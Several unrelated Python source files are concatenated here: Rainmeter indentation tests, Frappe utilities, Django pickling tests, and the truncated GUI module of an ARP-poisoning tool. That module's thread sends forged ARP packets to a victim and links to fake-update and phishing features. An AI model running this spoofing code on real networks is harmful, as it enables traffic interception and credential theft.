*args: args for the op.
**kwargs: kwargs for the op.
Returns:
a tensor result of applying the operation op, num times.
Raises:
ValueError: if the op is unknown or wrong.
"""
scope = kwargs.pop('scope', None)
with tf.variable_op_scope([inputs], scope, 'RepeatOp'):
tower = inputs
for _ in range(repetitions):
tower = op(tower, *args, **kwargs)
return tower
|
|
"""This module is for testing the indent rainmeter module."""
import sys
from unittest import TestCase
INDENT = sys.modules["Rainmeter.indentrainmeter"]
def indention_depth_from_initial(line):
"""Helper method to start with an initial indention type."""
return INDENT.calc_line_indention_depth(line, INDENT.IndentType.Initial, 0)
def indention_depth_from_fold(line):
"""Helper method to start with a fold marker indention type."""
return INDENT.calc_line_indention_depth(line, INDENT.IndentType.FoldMarker, 1)
def indention_depth_from_section(line):
"""Helper method to start with a section indention type."""
return INDENT.calc_line_indention_depth(line, INDENT.IndentType.Section, 1)
class TestCalcLineIndentionDepthFromInitial(TestCase):
"""
This test is for showing the behaviour detecting different indenttypes.
Context depth can increase depending how the document starts.
It accepts invalid Rainmeter definitions like:
Key=Value
at the beginning of your document. This will not fail the indention itself.
"""
def test_with_empty_line(self):
"""An empty line should be ignored."""
line = ""
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Initial, 0))
def test_with_comment(self):
"""A comment will be ignored."""
line = "; This is a comment"
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Initial, 0))
def test_with_fold_marker(self):
"""Fold markers increase the indention depth."""
line = ";; This is a fold marker"
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.FoldMarker, 1))
def test_with_section(self):
"""Section increase the indention depth."""
line = "[Section]"
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Section, 1))
def test_with_key_value(self):
"""Key values are actually invalid but they stay at the same indention level."""
line = "Key = Value"
indention_depth = indention_depth_from_initial(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Initial, 0))
class TestCalcLineIndentionDepthFromFoldMarker(TestCase):
"""
This test is to show the behaviour for an indention coming from a fold marker.
A fold marker is defined by ;;
and meant to be a synthatic sugar definition to fold multiple sections at once.
For example you can group all meters together or all about problem X.
"""
def test_with_empty_line(self):
"""
Due to the fold marker the indention depth is 1.
Thus the following indention depth stays at 1
but the line itself is rendered as zero.
This prevents a lot of whitespaces in the file
if you split up your section.
"""
line = ""
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.FoldMarker, 1))
def test_with_comment(self):
"""Comment are printed in the same indention level as given."""
line = "; This is a comment"
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.FoldMarker, 1))
def test_with_fold_marker(self):
"""Additional fold marker will be printed at the same level as the previous fold marker."""
line = ";; This is a fold marker"
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.FoldMarker, 1))
def test_with_section(self):
"""A section increases the depth context."""
line = "[Section]"
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.Section, 2))
def test_with_key_value(self):
"""
Special handled case since it is invalid.
KeyValue pairs stay at level 1.
"""
line = "Key = Value"
indention_depth = indention_depth_from_fold(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.FoldMarker, 1))
class TestCalcLineIndentionDepthFromSection(TestCase):
"""Section increase the depth level."""
def test_with_empty_line(self):
"""Empty lines are ignored."""
line = ""
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Section, 1))
def test_with_comment(self):
"""Comment are printed on same level as key value pairs."""
line = "; This is a comment"
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.Section, 1))
def test_with_fold_marker(self):
"""Invalid construct, but this counts as a simple comment."""
line = ";; This is a fold marker"
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.FoldMarker, 1))
def test_with_section(self):
"""Invalid construct. Section following a section are staying on the same level."""
line = "[Section]"
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (0, INDENT.IndentType.Section, 1))
def test_with_key_value(self):
"""KeyValue Pairs are printed on the next level."""
line = "Key = Value"
indention_depth = indention_depth_from_section(line)
self.assertEqual(indention_depth, (1, INDENT.IndentType.Section, 1))
class TestIndentWholeSection(TestCase):
"""This is about testing a whole function test."""
def test_one_section(self):
"""Testing a stand alone section."""
content = '''
[Rainmeter]
Update=1000
DynamicWindowSize=1
DefaultUpdateDivider=1000
AccurateText=1
OnWakeAction=[!Refresh "(Config)"]'''
result = '''
[Rainmeter]
\tUpdate=1000
\tDynamicWindowSize=1
\tDefaultUpdateDivider=1000
\tAccurateText=1
\tOnWakeAction=[!Refresh "(Config)"]'''
reference = INDENT.indent_text_by_tab_size(content)
self.assertEqual(reference, result)
def test_two_sections(self):
"""Testing only two consecutive sections."""
content = '''
[Rainmeter]
Update=1000
DynamicWindowSize=1
DefaultUpdateDivider=1000
AccurateText=1
OnWakeAction=[!Refresh "(Config)"]
[Metadata]
Name=TestEnvironment
Author=thatsIch
Information=PlayGround for Metadata
Version=0.0.1
License=MIT'''
result = '''
[Rainmeter]
\tUpdate=1000
\tDynamicWindowSize=1
\tDefaultUpdateDivider=1000
\tAccurateText=1
\tOnWakeAction=[!Refresh "(Config)"]
[Metadata]
\tName=TestEnvironment
\tAuthor=thatsIch
\tInformation=PlayGround for Metadata
\tVersion=0.0.1
\tLicense=MIT'''
reference = INDENT.indent_text_by_tab_size(content)
self.assertEqual(reference, result)
def test_section_with_divider(self):
"""After a divider a section can follow which needs to be fully indented."""
content = '''
;;====================================================
;; Rainmeter Section
;;====================================================
[Rainmeter]
Update=1000
DynamicWindowSize=1
DefaultUpdateDivider=1000
AccurateText=1
OnWakeAction=[!Refresh "(Config)"]'''
result = '''
;;====================================================
;; Rainmeter Section
;;====================================================
\t[Rainmeter]
\t\tUpdate=1000
\t\tDynamicWindowSize=1
\t\tDefaultUpdateDivider=1000
\t\tAccurateText=1
\t\tOnWakeAction=[!Refresh "(Config)"]'''
reference = INDENT.indent_text_by_tab_size(content)
self.assertEqual(reference, result)
def test_divider_with_two_sections(self):
"""
After a divider multiple sections can follow.
Both sections need to be fully indented.
"""
content = '''
;;====================================================
;; Rainmeter Section
;;====================================================
[Rainmeter]
Update=1000
DynamicWindowSize=1
DefaultUpdateDivider=1000
AccurateText=1
OnWakeAction=[!Refresh "(Config)"]
[Metadata]
Name=TestEnvironment
Author=thatsIch
Information=PlayGround for Metadata
Version=0.0.1
License=MIT'''
result = '''
;;====================================================
;; Rainmeter Section
;;====================================================
\t[Rainmeter]
\t\tUpdate=1000
\t\tDynamicWindowSize=1
\t\tDefaultUpdateDivider=1000
\t\tAccurateText=1
\t\tOnWakeAction=[!Refresh "(Config)"]
\t[Metadata]
\t\tName=TestEnvironment
\t\tAuthor=thatsIch
\t\tInformation=PlayGround for Metadata
\t\tVersion=0.0.1
\t\tLicense=MIT'''
reference = INDENT.indent_text_by_tab_size(content)
self.assertEqual(reference, result)
|
|
# Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
# util __init__.py
from __future__ import unicode_literals
from werkzeug.test import Client
import os, sys, re, urllib
import frappe
import requests
# utility functions like cint, int, flt, etc.
from frappe.utils.data import *
default_fields = ['doctype', 'name', 'owner', 'creation', 'modified', 'modified_by',
'parent', 'parentfield', 'parenttype', 'idx', 'docstatus']
# used in import_docs.py
# TODO: deprecate it
def getCSVelement(v):
"""
Returns the CSV value of `v`, For example:
* apple becomes "apple"
* hi"there becomes "hi""there"
"""
v = cstr(v)
if not v: return ''
if (',' in v) or ('\n' in v) or ('"' in v):
if '"' in v: v = v.replace('"', '""')
return '"'+v+'"'
else: return v or ''
def get_fullname(user=None):
"""get the full name (first name + last name) of the user from User"""
if not user:
user = frappe.session.user
if not hasattr(frappe.local, "fullnames"):
frappe.local.fullnames = {}
if not frappe.local.fullnames.get(user):
p = frappe.db.get_value("User", user, ["first_name", "last_name"], as_dict=True)
if p:
frappe.local.fullnames[user] = " ".join(filter(None,
[p.get('first_name'), p.get('last_name')])) or user
else:
frappe.local.fullnames[user] = user
return frappe.local.fullnames.get(user)
def get_formatted_email(user):
"""get email id of user formatted as: John Doe <johndoe@example.com>"""
if user == "Administrator":
return user
from email.utils import formataddr
fullname = get_fullname(user)
return formataddr((fullname, user))
def extract_email_id(email):
"""fetch only the email part of the email id"""
from email.utils import parseaddr
fullname, email_id = parseaddr(email)
if isinstance(email_id, basestring) and not isinstance(email_id, unicode):
email_id = email_id.decode("utf-8", "ignore")
return email_id
def validate_email_add(email_str, throw=False):
"""Validates the email string"""
if email_str and " " in email_str and "<" not in email_str:
# example: "test@example.com test2@example.com" will return "test@example.comtest2" after parseaddr!!!
return False
email = extract_email_id(email_str)
match = re.match("[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*@(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?", email.lower())
if not match:
return False
matched = match.group(0)
if match:
match = matched==email.lower()
if not match and throw:
frappe.throw(frappe._("{0} is not a valid email id").format(email),
frappe.InvalidEmailAddressError)
return matched
def split_emails(txt):
email_list = []
for email in re.split(''',(?=(?:[^"]|"[^"]*")*$)''', cstr(txt)):
email = strip(cstr(email))
if email:
email_list.append(email)
return email_list
def random_string(length):
"""generate a random string"""
import string
from random import choice
return ''.join([choice(string.letters + string.digits) for i in range(length)])
def get_gravatar(email):
import md5
return "https://secure.gravatar.com/avatar/{hash}?d=retro".format(hash=md5.md5(email).hexdigest())
def get_traceback():
"""
Returns the traceback of the Exception
"""
import traceback
exc_type, value, tb = sys.exc_info()
trace_list = traceback.format_tb(tb, None) + \
traceback.format_exception_only(exc_type, value)
body = "Traceback (innermost last):\n" + "%-20s %s" % \
(unicode((b"").join(trace_list[:-1]), 'utf-8'), unicode(trace_list[-1], 'utf-8'))
if frappe.logger:
frappe.logger.error('Db:'+(frappe.db and frappe.db.cur_db_name or '') \
+ ' - ' + body)
return body
def log(event, details):
frappe.logger.info(details)
def dict_to_str(args, sep='&'):
"""
Converts a dictionary to URL
"""
t = []
for k in args.keys():
t.append(str(k)+'='+urllib.quote(str(args[k] or '')))
return sep.join(t)
# Get Defaults
# ==============================================================================
def get_defaults(key=None):
"""
Get dictionary of default values from the defaults, or a value if key is passed
"""
return frappe.db.get_defaults(key)
def set_default(key, val):
"""
Set / add a default value to defaults`
"""
return frappe.db.set_default(key, val)
def remove_blanks(d):
"""
Returns d with empty ('' or None) values stripped
"""
empty_keys = []
for key in d:
if d[key]=='' or d[key]==None:
# del d[key] raises runtime exception, using a workaround
empty_keys.append(key)
for key in empty_keys:
del d[key]
return d
def strip_html_tags(text):
"""Remove html tags from text"""
return re.sub("\<[^>]*\>", "", text)
def pprint_dict(d, level=1, no_blanks=True):
"""
Pretty print a dictionary with indents
"""
if no_blanks:
remove_blanks(d)
# make indent
indent, ret = '', ''
for i in range(0,level): indent += '\t'
# add lines
comment, lines = '', []
kl = d.keys()
kl.sort()
# make lines
for key in kl:
if key != '##comment':
tmp = {key: d[key]}
lines.append(indent + str(tmp)[1:-1] )
# add comment string
if '##comment' in kl:
ret = ('\n' + indent) + '# ' + d['##comment'] + '\n'
# open
ret += indent + '{\n'
# lines
ret += indent + ',\n\t'.join(lines)
# close
ret += '\n' + indent + '}'
return ret
def get_common(d1,d2):
"""
returns (list of keys) the common part of two dicts
"""
return [p for p in d1 if p in d2 and d1[p]==d2[p]]
def get_common_dict(d1, d2):
"""
return common dictionary of d1 and d2
"""
ret = {}
for key in d1:
if key in d2 and d2[key]==d1[key]:
ret[key] = d1[key]
return ret
def get_diff_dict(d1, d2):
"""
return common dictionary of d1 and d2
"""
diff_keys = set(d2.keys()).difference(set(d1.keys()))
ret = {}
for d in diff_keys: ret[d] = d2[d]
return ret
def get_file_timestamp(fn):
"""
Returns timestamp of the given file
"""
from frappe.utils import cint
try:
return str(cint(os.stat(fn).st_mtime))
except OSError, e:
if e.args[0]!=2:
raise
else:
return None
# to be deprecated
def make_esc(esc_chars):
"""
Function generator for Escaping special characters
"""
return lambda s: ''.join(['\\' + c if c in esc_chars else c for c in s])
# esc / unescape characters -- used for command line
def esc(s, esc_chars):
"""
Escape special characters
"""
if not s:
return ""
for c in esc_chars:
esc_str = '\\' + c
s = s.replace(c, esc_str)
return s
def unesc(s, esc_chars):
"""
UnEscape special characters
"""
for c in esc_chars:
esc_str = '\\' + c
s = s.replace(esc_str, c)
return s
def execute_in_shell(cmd, verbose=0):
# using Popen instead of os.system - as recommended by python docs
from subprocess import Popen
import tempfile
with tempfile.TemporaryFile() as stdout:
with tempfile.TemporaryFile() as stderr:
p = Popen(cmd, shell=True, stdout=stdout, stderr=stderr)
p.wait()
stdout.seek(0)
out = stdout.read()
stderr.seek(0)
err = stderr.read()
if verbose:
if err: print err
if out: print out
return err, out
def get_path(*path, **kwargs):
base = kwargs.get('base')
if not base:
base = frappe.local.site_path
return os.path.join(base, *path)
def get_site_base_path(sites_dir=None, hostname=None):
return frappe.local.site_path
def get_site_path(*path):
return get_path(base=get_site_base_path(), *path)
def get_files_path(*path):
return get_site_path("public", "files", *path)
def get_backups_path():
return get_site_path("private", "backups")
def get_request_site_address(full_address=False):
return get_url(full_address=full_address)
def encode_dict(d, encoding="utf-8"):
for key in d:
if isinstance(d[key], basestring) and isinstance(d[key], unicode):
d[key] = d[key].encode(encoding)
return d
def decode_dict(d, encoding="utf-8"):
for key in d:
if isinstance(d[key], basestring) and not isinstance(d[key], unicode):
d[key] = d[key].decode(encoding, "ignore")
return d
def get_site_name(hostname):
return hostname.split(':')[0]
def get_disk_usage():
"""get disk usage of files folder"""
files_path = get_files_path()
if not os.path.exists(files_path):
return 0
err, out = execute_in_shell("du -hsm {files_path}".format(files_path=files_path))
return cint(out.split("\n")[-2].split("\t")[0])
def touch_file(path):
with open(path, 'a'):
os.utime(path, None)
return True
def get_test_client():
from frappe.app import application
return Client(application)
def get_hook_method(hook_name, fallback=None):
method = (frappe.get_hooks().get(hook_name))
if method:
method = frappe.get_attr(method[0])
return method
if fallback:
return fallback
def update_progress_bar(txt, i, l):
lt = len(txt)
if lt < 36:
txt = txt + " "*(36-lt)
complete = int(float(i+1) / l * 40)
sys.stdout.write("\r{0}: [{1}{2}]".format(txt, "="*complete, " "*(40-complete)))
sys.stdout.flush()
def get_html_format(print_path):
html_format = None
if os.path.exists(print_path):
with open(print_path, "r") as f:
html_format = f.read()
for include_directive, path in re.findall("""({% include ['"]([^'"]*)['"] %})""", html_format):
for app_name in frappe.get_installed_apps():
include_path = frappe.get_app_path(app_name, *path.split(os.path.sep))
if os.path.exists(include_path):
with open(include_path, "r") as f:
html_format = html_format.replace(include_directive, f.read())
break
return html_format
def is_markdown(text):
if "<!-- markdown -->" in text:
return True
elif "<!-- html -->" in text:
return False
else:
return not re.search("<p[\s]*>|<br[\s]*>", text)
def get_sites(sites_path=None):
import os
if not sites_path:
sites_path = '.'
return [site for site in os.listdir(sites_path)
if os.path.isdir(os.path.join(sites_path, site))
and not site in ('assets',)]
def get_request_session(max_retries=3):
from requests.packages.urllib3.util import Retry
session = requests.Session()
session.mount("http://", requests.adapters.HTTPAdapter(max_retries=Retry(total=5, status_forcelist=[500])))
session.mount("https://", requests.adapters.HTTPAdapter(max_retries=Retry(total=5, status_forcelist=[500])))
return session
|
|
import datetime
import pickle
from django.db import models
from django.test import TestCase
from django.utils.version import get_version
from .models import Container, Event, Group, Happening, M2MModel
class PickleabilityTestCase(TestCase):
def setUp(self):
Happening.objects.create() # make sure the defaults are working (#20158)
def assert_pickles(self, qs):
self.assertEqual(list(pickle.loads(pickle.dumps(qs))), list(qs))
def test_related_field(self):
g = Group.objects.create(name="Ponies Who Own Maybachs")
self.assert_pickles(Event.objects.filter(group=g.id))
def test_datetime_callable_default_all(self):
self.assert_pickles(Happening.objects.all())
def test_datetime_callable_default_filter(self):
self.assert_pickles(Happening.objects.filter(when=datetime.datetime.now()))
def test_string_as_default(self):
self.assert_pickles(Happening.objects.filter(name="test"))
def test_standalone_method_as_default(self):
self.assert_pickles(Happening.objects.filter(number1=1))
def test_staticmethod_as_default(self):
self.assert_pickles(Happening.objects.filter(number2=1))
def test_filter_reverse_fk(self):
self.assert_pickles(Group.objects.filter(event=1))
def test_doesnotexist_exception(self):
# Ticket #17776
original = Event.DoesNotExist("Doesn't exist")
unpickled = pickle.loads(pickle.dumps(original))
# Exceptions are not equal to equivalent instances of themselves, so
# can't just use assertEqual(original, unpickled)
self.assertEqual(original.__class__, unpickled.__class__)
self.assertEqual(original.args, unpickled.args)
def test_manager_pickle(self):
pickle.loads(pickle.dumps(Happening.objects))
def test_model_pickle(self):
"""
A model not defined on module level is picklable.
"""
original = Container.SomeModel(pk=1)
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
# Also, deferred dynamic model works
Container.SomeModel.objects.create(somefield=1)
original = Container.SomeModel.objects.defer('somefield')[0]
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
self.assertEqual(original.somefield, reloaded.somefield)
def test_model_pickle_m2m(self):
"""
Test intentionally the automatically created through model.
"""
m1 = M2MModel.objects.create()
g1 = Group.objects.create(name='foof')
m1.groups.add(g1)
m2m_through = M2MModel._meta.get_field('groups').remote_field.through
original = m2m_through.objects.get()
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
def test_model_pickle_dynamic(self):
class Meta:
proxy = True
dynclass = type("DynamicEventSubclass", (Event, ), {'Meta': Meta, '__module__': Event.__module__})
original = dynclass(pk=1)
dumped = pickle.dumps(original)
reloaded = pickle.loads(dumped)
self.assertEqual(original, reloaded)
self.assertIs(reloaded.__class__, dynclass)
def test_specialized_queryset(self):
self.assert_pickles(Happening.objects.values('name'))
self.assert_pickles(Happening.objects.values('name').dates('when', 'year'))
# With related field (#14515)
self.assert_pickles(
Event.objects.select_related('group').order_by('title').values_list('title', 'group__name')
)
def test_pickle_prefetch_related_idempotence(self):
g = Group.objects.create(name='foo')
groups = Group.objects.prefetch_related('event_set')
# First pickling
groups = pickle.loads(pickle.dumps(groups))
self.assertSequenceEqual(groups, [g])
# Second pickling
groups = pickle.loads(pickle.dumps(groups))
self.assertSequenceEqual(groups, [g])
def test_pickle_prefetch_queryset_usable_outside_of_prefetch(self):
# Prefetch shouldn't affect the fetch-on-pickle behavior of the
# queryset passed to it.
Group.objects.create(name='foo')
events = Event.objects.order_by('id')
Group.objects.prefetch_related(models.Prefetch('event_set', queryset=events))
with self.assertNumQueries(1):
events2 = pickle.loads(pickle.dumps(events))
with self.assertNumQueries(0):
list(events2)
def test_pickle_prefetch_queryset_still_usable(self):
g = Group.objects.create(name='foo')
groups = Group.objects.prefetch_related(
models.Prefetch('event_set', queryset=Event.objects.order_by('id'))
)
groups2 = pickle.loads(pickle.dumps(groups))
self.assertSequenceEqual(groups2.filter(id__gte=0), [g])
def test_pickle_prefetch_queryset_not_evaluated(self):
Group.objects.create(name='foo')
groups = Group.objects.prefetch_related(
models.Prefetch('event_set', queryset=Event.objects.order_by('id'))
)
list(groups) # evaluate QuerySet
with self.assertNumQueries(0):
pickle.loads(pickle.dumps(groups))
def test_pickle_prefetch_related_with_m2m_and_objects_deletion(self):
"""
#24831 -- Cached properties on ManyToOneRel created in QuerySet.delete()
caused subsequent QuerySet pickling to fail.
"""
g = Group.objects.create(name='foo')
m2m = M2MModel.objects.create()
m2m.groups.add(g)
Group.objects.all().delete()
m2ms = M2MModel.objects.prefetch_related('groups')
m2ms = pickle.loads(pickle.dumps(m2ms))
self.assertSequenceEqual(m2ms, [m2m])
def test_annotation_with_callable_default(self):
# Happening.when has a callable default of datetime.datetime.now.
qs = Happening.objects.annotate(latest_time=models.Max('when'))
self.assert_pickles(qs)
def test_missing_django_version_unpickling(self):
"""
#21430 -- Verifies a warning is raised for querysets that are
unpickled without a Django version
"""
qs = Group.missing_django_version_objects.all()
msg = "Pickled queryset instance's Django version is not specified."
with self.assertRaisesMessage(RuntimeWarning, msg):
pickle.loads(pickle.dumps(qs))
def test_unsupported_unpickle(self):
"""
#21430 -- Verifies a warning is raised for querysets that are
unpickled with a different Django version than the current
"""
qs = Group.previous_django_version_objects.all()
msg = "Pickled queryset instance's Django version 1.0 does not match the current version %s." % get_version()
with self.assertRaisesMessage(RuntimeWarning, msg):
pickle.loads(pickle.dumps(qs))
class InLookupTests(TestCase):
@classmethod
def setUpTestData(cls):
for i in range(1, 3):
group = Group.objects.create(name='Group {}'.format(i))
cls.e1 = Event.objects.create(title='Event 1', group=group)
def test_in_lookup_queryset_evaluation(self):
"""
Neither pickling nor unpickling a QuerySet.query with an __in=inner_qs
lookup should evaluate inner_qs.
"""
events = Event.objects.filter(group__in=Group.objects.all())
with self.assertNumQueries(0):
dumped = pickle.dumps(events.query)
with self.assertNumQueries(0):
reloaded = pickle.loads(dumped)
reloaded_events = Event.objects.none()
reloaded_events.query = reloaded
self.assertSequenceEqual(reloaded_events, [self.e1])
def test_in_lookup_query_evaluation(self):
events = Event.objects.filter(group__in=Group.objects.values('id').query)
with self.assertNumQueries(0):
dumped = pickle.dumps(events.query)
with self.assertNumQueries(0):
reloaded = pickle.loads(dumped)
reloaded_events = Event.objects.none()
reloaded_events.query = reloaded
self.assertSequenceEqual(reloaded_events, [self.e1])
|
|
#The MIT License (MIT)
#Copyright (c) 2015-2016 mh4x0f P0cL4bs Team
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from Core.Settings import frm_Settings
from Modules.ModuleUpdateFake import frm_update_attack
from Modules.ModuleTemplates import frm_template
from Modules.utils import ProcessThread,Refactor,ThreadScan
from os import popen,chdir,getcwd,getuid,devnull,system
from scapy.all import *
import threading
from urllib2 import urlopen,URLError
from re import search,compile
from multiprocessing import Process,Manager
from time import sleep
threadloading = {'template':[],'posion':[]}
class frm_Arp(QMainWindow):
def __init__(self, parent=None):
super(frm_Arp, self).__init__(parent)
self.form_widget = frm_Arp_Poison(self)
self.setCentralWidget(self.form_widget)
class ThreadAttackPosion(QThread):
def __init__(self,victim,gateway,mac):
QThread.__init__(self)
self.victim = victim
self.gateway = gateway
self.mac = mac
self.process = True
def run(self):
print 'Starting Thread:' + self.objectName()
while self.process:
arp = ARP(op=1,psrc=self.gateway,pdst=self.victim,hwdst=self.mac)
send(arp,verbose=False)
sleep(2)
def stop(self):
self.process = False
print 'Stop thread:' + self.objectName()
self.emit(SIGNAL('Activated( QString )'),'Ok')
class frm_Arp_Poison(QWidget):
def __init__(self, parent=None):
super(frm_Arp_Poison, self).__init__(parent)
self.setWindowTitle('Arp Posion Attack ')
self.setWindowIcon(QIcon('rsc/icon.ico'))
self.Main = QVBoxLayout()
self.owd = getcwd()
self.control = False
self.interfaces = Refactor.get_interfaces()
self.configure = frm_Settings()
self.loadtheme(self.configure.XmlThemeSelected())
self.module_network = Refactor
self.data = {'IPaddress':[], 'Hostname':[], 'MacAddress':[]}
self.ThreadDirc = {'Arp_posion':[]}
global threadloading
self.GUI()
def closeEvent(self, event):
if (len(self.ThreadDirc['Arp_posion']) != 0) or len(threadloading['template']) !=0:
reply = QMessageBox.question(self, 'About Exit','Are you sure to close ArpPosion?', QMessageBox.Yes |
QMessageBox.No, QMessageBox.No)
if reply == QMessageBox.Yes:
event.accept()
if getuid() == 0:
try:
for i in self.ThreadDirc['Arp_posion']:
i.stop(),i.join()
for i in threadloading['template']:
i.stop(),i.join()
threadloading['template'] = []
except:pass
self.deleteLater()
else:
pass
else:
event.ignore()
def loadtheme(self,theme):
sshFile=("Core/%s.qss"%(theme))
with open(sshFile,"r") as fh:
self.setStyleSheet(fh.read())
def GUI(self):
self.form =QFormLayout()
self.movie = QMovie('rsc/loading2.gif', QByteArray(), self)
size = self.movie.scaledSize()
self.setGeometry(200, 200, size.width(), size.height())
self.movie_screen = QLabel()
self.movie_screen.setFixedHeight(200)
self.movie_screen.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding)
self.movie_screen.setAlignment(Qt.AlignCenter)
self.movie.setCacheMode(QMovie.CacheAll)
self.movie.setSpeed(100)
self.movie_screen.setMovie(self.movie)
self.movie_screen.setDisabled(False)
self.movie.start()
self.tables = QTableWidget(5,3)
self.tables.setRowCount(100)
self.tables.setFixedHeight(200)
self.tables.setSelectionBehavior(QAbstractItemView.SelectRows)
self.tables.setEditTriggers(QAbstractItemView.NoEditTriggers)
self.tables.clicked.connect(self.list_clicked_scan)
self.tables.resizeColumnsToContents()
self.tables.resizeRowsToContents()
self.tables.horizontalHeader().resizeSection(1,120)
self.tables.horizontalHeader().resizeSection(0,145)
self.tables.horizontalHeader().resizeSection(2,158)
self.tables.verticalHeader().setVisible(False)
Headers = []
for key in reversed(self.data.keys()):
Headers.append(key)
self.tables.setHorizontalHeaderLabels(Headers)
self.txt_target = QLineEdit(self)
self.txt_gateway = QLineEdit(self)
self.txt_redirect = QLineEdit(self)
self.txt_mac = QLineEdit(self)
self.ip_range = QLineEdit(self)
self.txt_status_scan = QLabel('')
self.txt_statusarp = QLabel('')
self.txt_status_phishing = QLabel('')
self.StatusMonitor(False,'stas_scan')
self.StatusMonitor(False,'stas_arp')
self.StatusMonitor(False,'stas_phishing')
scan_range = self.configure.xmlSettings('scan','rangeIP',None,False)
self.ip_range.setText(scan_range)
self.btn_start_scanner = QPushButton('Scan')
self.btn_stop_scanner = QPushButton('Stop')
self.btn_Attack_Posion = QPushButton('Start Attack')
self.btn_Stop_Posion = QPushButton('Stop Attack')
self.btn_server = QPushButton('Templates')
self.btn_windows_update = QPushButton('Fake Update')
self.btn_server.setFixedHeight(22)
self.btn_stop_scanner.setFixedWidth(100)
self.btn_start_scanner.setFixedWidth(100)
self.btn_start_scanner.setFixedHeight(22)
self.btn_stop_scanner.setFixedHeight(22)
self.btn_windows_update.setFixedHeight(22)
self.btn_start_scanner.clicked.connect(self.Start_scan)
self.btn_stop_scanner.clicked.connect(self.Stop_scan)
self.btn_Attack_Posion.clicked.connect(self.Start_Attack)
self.btn_Stop_Posion.clicked.connect(self.kill_attack)
self.btn_server.clicked.connect(self.show_template_dialog)
self.btn_windows_update.clicked.connect(self.show_frm_fake)
#icons
self.btn_start_scanner.setIcon(QIcon('rsc/network.png'))
self.btn_Attack_Posion.setIcon(QIcon('rsc/start.png'))
self.btn_Stop_Posion.setIcon(QIcon('rsc/Stop.png'))
self.btn_stop_scanner.setIcon(QIcon('rsc/network_off.png'))
self.btn_server.setIcon(QIcon('rsc/page.png'))
self.btn_windows_update.setIcon(QIcon('rsc/winUp.png'))
self.grid0 = QGridLayout()
self.grid0.minimumSize()
self.grid0.addWidget(QLabel('ArpPosion:'),0,2)
self.grid0.addWidget(QLabel('Phishing:'),0,4)
self.grid0.addWidget(QLabel('Scanner:'),0,0)
self.grid0.addWidget(self.txt_status_scan,0,1)
self.grid0.addWidget(self.txt_statusarp,0,3)
self.grid0.addWidget(self.txt_status_phishing,0,5)
# grid options
self.grid1 = QGridLayout()
self.grid1.addWidget(self.btn_start_scanner,0,0)
self.grid1.addWidget(self.btn_stop_scanner,0,1)
self.grid1.addWidget(self.btn_server,0,2)
self.grid1.addWidget(self.btn_windows_update, 0,3)
#btn
self.grid2 = QGridLayout()
self.grid2.addWidget(self.btn_Attack_Posion,1,0)
self.grid2.addWidget(self.btn_Stop_Posion,1,5)
x = self.interfaces
if x['gateway'] != None:
self.txt_gateway.setText(x['gateway'])
self.txt_redirect.setText(x['IPaddress'])
self.txt_mac.setText(Refactor.getHwAddr(x['activated']))
self.form0 = QGridLayout()
self.form0.addWidget(self.movie_screen,0,0)
self.form0.addWidget(self.tables,0,0)
self.form.addRow(self.form0)
self.form.addRow(self.grid1)
self.form.addRow('Target:', self.txt_target)
self.form.addRow('Gateway:', self.txt_gateway)
self.form.addRow('MAC address:', self.txt_mac)
self.form.addRow('Redirect IP:', self.txt_redirect)
self.form.addRow('IP ranger Scan:',self.ip_range)
self.form.addRow(self.grid0)
self.form.addRow(self.grid2)
self.Main.addLayout(self.form)
self.setLayout(self.Main)
def thread_scan_reveice(self,info_ip):
self.StatusMonitor(False,'stas_scan')
self.movie_screen.setDisabled(False)
self.tables.setVisible(True)
data = info_ip.split('|')
Headers = []
self.data['IPaddress'].append(data[0])
self.data['MacAddress'].append(data[1])
self.data['Hostname'].append(data[2])
for n, key in enumerate(reversed(self.data.keys())):
Headers.append(key)
